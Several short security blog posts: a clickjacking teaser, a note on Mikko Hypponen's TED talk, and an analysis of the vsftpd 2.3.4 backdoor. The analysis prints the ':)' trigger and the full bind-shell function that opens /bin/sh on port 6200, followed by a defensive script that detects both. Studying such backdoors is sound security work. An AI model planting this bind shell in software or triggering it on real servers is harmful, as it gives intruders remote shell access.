ClickJacking – A Demonstration Of An Ongoing Problem

After coming across a couple of news sites reporting on ClickJacking this afternoon, I decided to create a post that demonstrates just how easily ClickJacking is done. Please be aware that this post is very high level and not an in-depth look at the attack vector. The hope is that you can use it to show your friends / family just how easy it is to be caught out.

Due to the content of the post, I have put the content on a separate page:
(By the way, the irony of clicking a link to get to a page about clickjacking is not lost on me 😀 If you are unsure, just copy the above link instead.)

Mikko Hypponen Talk at TED

For those that haven’t seen it, Mikko Hypponen (of F-Secure AntiVirus) has given a talk at TED about the future of security on the internet.

It’s an entertaining look into the world of antivirus research, with elements from malware history, as well as an interesting look at the stupidity of some malware creators.

Now if you are established in the computer security scene, you are not likely to learn anything technical from this talk, but what I enjoyed was Mikko’s enthusiasm on his pursuit of protecting the Internet.

The talk can be found at TED here.

Vsftpd Backdoor Discovered

As you may have seen, there was a backdoor planted within version 2.3.4 of Vsftpd. Along with the announcement came confirmation from Chris Evans that Vsftpd’s hosting would be moved to Google.

The backdoor trigger was planted within ‘str.c’:

    else if((p_str->p_buf[i]==0x3a)
         && (p_str->p_buf[i+1]==0x29))

As you can see, the code checks for the adjacent bytes 0x3a and 0x29: or ‘:)’ for those who don’t like ASCII.

The vsf_sysutil_extra() function is then added to sysdeputil.c:

    int vsf_sysutil_extra(void)
    {
      int fd, rfd;
      struct sockaddr_in sa;
      /* create a TCP socket; bail out on failure, as the bind/listen checks below do */
      if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        exit(1);
      memset(&sa, 0, sizeof(sa));
      sa.sin_family = AF_INET;
      sa.sin_port = htons(6200);          /* the backdoor port */
      sa.sin_addr.s_addr = INADDR_ANY;    /* on every interface */
      if((bind(fd,(struct sockaddr *)&sa,
         sizeof(struct sockaddr))) < 0) exit(1);
      if((listen(fd, 100)) == -1) exit(1);
      rfd = accept(fd, 0, 0);
      /* attach the accepted connection to stdin, stdout and stderr ... */
      close(0); close(1); close(2);
      dup2(rfd, 0); dup2(rfd, 1); dup2(rfd, 2);
      /* ... and replace the process image with a shell */
      execl("/bin/sh","sh",(char *)0);
    }

Quite a simple and obvious backdoor, with no real attempt made to obscure the payload. It simply binds to port 6200 on all interfaces and listens forever, accepting connections and spawning a shell on each one.
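Two defender-side checks for exactly this backdoor, as an added example that is not code from the post or from the vsftpd project: a source audit that looks for the two planted fragments with whitespace folded so reformatting cannot hide them, and a scan of captured FTP control-channel commands for USER names carrying the 0x3a 0x29 trigger pair. The signature patterns, file names and sample data are my own constructions.

```python
import re

# Adjacent byte pair the planted check in str.c looks for: 0x3a 0x29, i.e. ':)'.
TRIGGER = b"\x3a\x29"

# Signatures of the two planted fragments, matched against source with all
# whitespace removed (patterns are assumptions based on the fragments quoted above).
SIGNATURES = {
    "trigger check in str.c":
        re.compile(r"p_buf\[i\]==0x3a\)?&&\(?p_str->p_buf\[i\+1\]==0x29"),
    "backdoor listener in sysdeputil.c":
        re.compile(r'vsf_sysutil_extra\(void\).*htons\(6200\).*execl\("/bin/sh"', re.S),
}

def audit_sources(files: dict) -> list:
    """Return (file name, description) pairs for every backdoor signature found."""
    findings = []
    for name, text in files.items():
        folded = re.sub(r"\s+", "", text)      # defeat re-indentation / line breaks
        for desc, pat in SIGNATURES.items():
            if pat.search(folded):
                findings.append((name, desc))
    return findings

def flagged_logins(ftp_commands: bytes) -> list:
    """From captured FTP commands (one per line) return USER arguments
    that contain the trigger byte pair, for log or IDS review."""
    hits = []
    for line in ftp_commands.splitlines():
        if line.upper().startswith(b"USER ") and TRIGGER in line[5:]:
            hits.append(line[5:].strip())
    return hits

# Constructed sample tree: the two fragments as quoted in the post, plus a clean file.
SAMPLE_TREE = {
    "str.c": "else if((p_str->p_buf[i]==0x3a)\n  && (p_str->p_buf[i+1]==0x29))\n",
    "sysdeputil.c": 'int vsf_sysutil_extra(void)\n{ /* ... */ sa.sin_port = htons(6200);\n'
                    '  execl("/bin/sh","sh",(char *)0); }\n',
    "main.c": "int main(void) { return 0; }\n",
}

# Constructed capture of FTP login commands, one of them carrying the trigger.
SAMPLE_CAPTURE = b"USER ftp\r\nPASS guest\r\nUSER backdoor:)\r\nPASS x\r\n"

if __name__ == "__main__":
    for name, desc in audit_sources(SAMPLE_TREE):
        print(f"{name}: {desc}")
    print("flagged logins:", flagged_logins(SAMPLE_CAPTURE))
```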